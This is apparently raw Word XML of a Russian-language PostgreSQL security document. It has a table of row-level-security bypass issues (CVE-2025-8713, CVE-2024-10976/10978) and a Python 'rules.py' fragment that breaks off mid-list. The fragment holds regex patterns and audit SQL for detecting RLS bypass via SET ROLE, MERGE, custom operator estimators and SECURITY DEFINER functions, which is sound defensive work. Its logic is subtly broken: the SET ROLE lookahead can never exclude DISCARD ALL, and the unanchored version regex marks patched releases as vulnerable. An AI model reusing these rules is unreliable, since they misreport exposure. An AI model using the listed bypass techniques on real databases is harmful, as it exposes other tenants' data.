                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tenant role + SET ROLE per-request + pool</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9797DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0EB83425"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7BE617" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.4</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36E67D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2025-8713</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34ECA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(Medium)</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669E34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.5, 16.9, 15.13, 14.18, 13.21</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CFFB56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.6, 16.10, 15.14, 14.19, 13.22</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E9C42E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.08.2025</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18082B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE OPERATOR/FUNCTION + side-channel</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FE3EB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2DBE4A5C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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B51E1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3.17.5</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516B51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>— (pattern)</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EFD63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</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9B754A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>все версии</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EF65D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>— (mitigations only)</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218C71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</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15A783" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EXECUTE на SD-функцию</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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C842FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.6, 3.16.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78378795" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Хук для rules.py: класс RLS_BYPASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05594902" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># rules.py фрагмент — детекция RLS bypass patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52782A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD8C410" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E68DB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RLS_BYPASS_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD7F269" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.17.1 / 3.17.3: SET ROLE без DISCARD ALL после</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137B77D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bSET\s+ROLE\b.*(?!DISCARD\s+ALL)", re.IGNORECASE | re.DOTALL),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B06652" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bSET\s+SESSION\s+AUTHORIZATION\b", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4451FFA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C9756D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.17.2: MERGE на RLS-protected tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AA9338" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bMERGE\s+INTO\b", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DE7CCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F667375" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.17.4: custom operators с restrict/join estimator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867FEB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"CREATE\s+OPERATOR\b[^;]*\b(RESTRICT|JOIN)\s*=", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A35039" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C499F2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.17.5: SECURITY DEFINER без FORCE ROW LEVEL SECURITY на читаемой таблице</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6C86F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (требует cross-check с pg_class.relforcerowsecurity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2181C696" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC25B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092F79F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RLS_BYPASS_PROC_AUDITS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D666060" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SD-функции от superuser, читающие RLS-protected tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8C41CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC54A4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT n.nspname, p.proname FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BFB32D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    JOIN pg_namespace n ON n.oid = p.pronamespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1249AB54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    JOIN pg_roles r ON r.oid = p.proowner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E7129" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0987FBDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND (r.rolsuper = true OR r.rolbypassrls = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D59863" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D43DEA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Tables с RLS но БЕЗ FORCE RLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC1EB4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C2CF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT n.nspname, c.relname FROM pg_class c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0579E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    JOIN pg_namespace n ON n.oid = c.relnamespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21CCDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE c.relrowsecurity = true AND c.relforcerowsecurity = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBCF421" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE7884" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # PG-version-check для 3.17.1/3.17.3 (CVE-2024-10976/10978)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14925AC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0B984" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT version() ~ '(PostgreSQL 17\\.0|16\\.[0-4]|15\\.[0-8]|14\\.[0-9]|14\\.1[0-3]|13\\.[0-9]|13\\.1[0-6]|12\\.[0-9]|12\\.1[0-9]|12\\.20)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC9CC28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        AS is_vulnerable_to_2024_10976_10978</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA9CDC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4854C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE988C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5330E108" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RLS_BYPASS_SIGNATURES = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535C63A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # runtime: behavioral / log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B025C23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
